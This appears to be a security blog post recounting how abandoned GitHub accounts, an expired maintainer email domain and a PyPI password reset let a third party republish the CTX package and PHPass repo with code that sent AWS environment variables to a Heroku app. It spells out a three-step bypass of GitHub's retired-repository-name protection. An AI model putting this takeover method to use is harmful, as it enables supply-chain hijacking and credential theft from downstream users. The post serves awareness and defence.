When open-source developers walk away from maintaining their projects, it poses a high risk to all source code that is dependent on them. This is pretty much what happened with the CTX Python library.
This post includes a couple of indicators of compromise, which will help you understand how to catch these scenarios in the future.
Between September 2021 and May 2022, the Nordstrom-owned clothing brand named HauteLook closed their GitHub account. They had been receding from the open-source community.
In September 2021 they zapped their popular AliceBundle repo without a word.
On May 15th, 2022 the GitHub username HauteLook was registered, again, by an interested third party.
It means that the new owner of the GitHub account could act on behalf of the deleted account.
The open-source developer FigLeif (the name sounds like a typo-squatting) was stale between July 2020 and May 2022. He had developed and maintained the CTX python package, which affords python developers the syntactic sugar of addressing data structure elements in efficient attribute-access notation (i.e. foo.bar.baz) rather than the cumbersome item-access notation (i.e. foo["bar"]["baz"]) functionality which may seem frivolous to the uninitiated, but try typing all those brackets and quotes sometime - your pinkies will hate you for it ;-)
FigLeif's email domain expired in August 2021 but was reregistered by the same interested third party from Part 1 above.
The same interested third party cleverly recreated retired repos of CTX and HauteLook's most prominent repo, a sadly named password hashing library, PHPass.
GitHub has a security control to prevent the creation of repository names that are equivalent to retired repository names, but the new owner of the FigLeif and HauteLook orgs found a bypass for it: change your username to something other than the previous owner of the repository >> create a repository with the name of the retired repository >> change the username back to the previous owner.
Having done this, the interested party, a security researcher and college student named Yunus Aydin, blogged about the attack and posted it to his LinkedIn.
Yunus modified the packages so that any time they run, the AWS environment variables are sent to an Heroku-hosted app Yunus controlled.
This is dangerous because many applications, especially cloud hosted and containerized ones, store sensitive secrets in environment variables.
Since Yunus managed to take over FigLeif’s domain, he managed reset the password to PyPi, which followed by uploading the malicious package to PyPi on May 14.
The security researcher, Somdev, found additional instance of the same by running a GitHub search. Thank you!
All open-source software needs a succession plan for when their maintainers move on. Building a successful, stable, useful library is surprisingly thankless. Both PHPass and CTX hadn't been touched in years and hadn't needed it. Their developers can't be blamed for losing interest.